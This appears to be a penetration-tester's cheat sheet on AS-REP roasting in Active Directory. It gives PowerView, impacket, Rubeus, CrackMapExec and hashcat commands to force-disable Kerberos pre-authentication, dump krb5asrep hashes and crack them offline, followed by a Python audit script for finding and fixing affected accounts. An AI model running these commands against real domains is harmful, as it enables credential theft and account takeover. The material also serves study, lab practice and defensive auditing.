Dump krb5asrep hashes of user accounts that do not require Kerberos pre-authentication
Users do not have to be service accounts
Target accounts must have pre-authentication disabled (the DONT_REQ_PREAUTH bit in userAccountControl)
Anyone can request an AS-REP for such a user: the KDC skips pre-authentication validation, so the reply contains data encrypted with the user's password-derived key
Crack the dumped hash offline with hashcat
Exploitation
Force Disable Kerberos Preauth
# Using PowerView 3.0/dev
# Enumerate permissions for RDPUsers on ACLs
Invoke-ACLScanner -ResolveGUIDs | ?{ $_.IdentityReferenceName -match "RDPUsers" }
# Disable preauth for user (note: -XOR toggles the bit rather than setting it)
Set-DomainObject -Identity Control572User -XOR @{useraccountcontrol=4194304} -Verbose
Enumerate Users with Preauth Disabled
# Using PowerView 3.0/dev
Get-DomainUser -PreauthNotRequired -Verbose | Select samaccountname
# Using AD Module
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth
# Query AS-REP-roastable users with impacket from Kali host
# Supply userlist and don't require authentication
GetNPUsers.py -dc-ip 10.10.149.145 -no-pass -usersfile users.txt -format hashcat -outputfile hashes.asrep spookysec.local/

# Dump krb5asrep hash for specific user and output in hashcat format to file
.\Rubeus.exe asreproast /user:control572user /format:hashcat /outfile:control572user.asrep
# Dump hashes with credentials using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
# Transfer hash onto attacker and insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....
# Crack hash with hashcat (mode 18200 = Kerberos 5 etype 23 AS-REP)
hashcat -a 0 -m 18200 hash.txt rockyou.txt
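The enumeration and the userAccountControl XOR above both hinge on one bit, DONT_REQ_PREAUTH (0x400000 = 4194304). The following is an added audit example, not part of the original notes: it decodes that bit from a constructed LDAP export of userAccountControl values, lists the accounts a defender should remediate, and shows why -XOR is a toggle (applying it twice re-enables pre-auth) while clearing the bit is idempotent. The sample users and flag subset are constructed for illustration.

```python
from typing import Dict, List

# Subset of documented userAccountControl bit values.
UAC_FLAGS: Dict[str, int] = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,  # 4194304, the value the notes XOR into the account
}


def decode_uac(uac: int) -> List[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if uac & bit]


def preauth_disabled(uac: int) -> bool:
    """True when the account does not require Kerberos pre-authentication."""
    return bool(uac & UAC_FLAGS["DONT_REQ_PREAUTH"])


def xor_flag(uac: int, bit: int) -> int:
    """Mimic Set-DomainObject -XOR: flips the bit, so a second application undoes the first."""
    return uac ^ bit


def clear_flag(uac: int, bit: int) -> int:
    """Idempotent remediation: clear the bit regardless of its current state."""
    return uac & ~bit


# Constructed sample of an LDAP export: (sAMAccountName, userAccountControl).
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x200 | 0x10000 | 0x400000},
    {"sAMAccountName": "control572user", "userAccountControl": 0x200 | 0x400000},
    {"sAMAccountName": "old-admin", "userAccountControl": 0x200 | 0x2 | 0x400000},
]


def audit_preauth(users) -> List[str]:
    """Enabled accounts with DONT_REQ_PREAUTH set; disabled accounts are skipped
    because the KDC rejects AS-REQs for them, so they are not roastable."""
    return [u["sAMAccountName"] for u in users
            if preauth_disabled(u["userAccountControl"])
            and not u["userAccountControl"] & UAC_FLAGS["ACCOUNTDISABLE"]]


if __name__ == "__main__":
    for name in audit_preauth(SAMPLE_USERS):
        print("pre-auth disabled, remediate:", name)
    uac = 0x200
    print("after one XOR:", decode_uac(xor_flag(uac, 0x400000)))
    print("after two XORs:", decode_uac(xor_flag(xor_flag(uac, 0x400000), 0x400000)))
```

The audit output corresponds to what `Get-DomainUser -PreauthNotRequired` returns; fixing the finding is `clear_flag`, not another XOR.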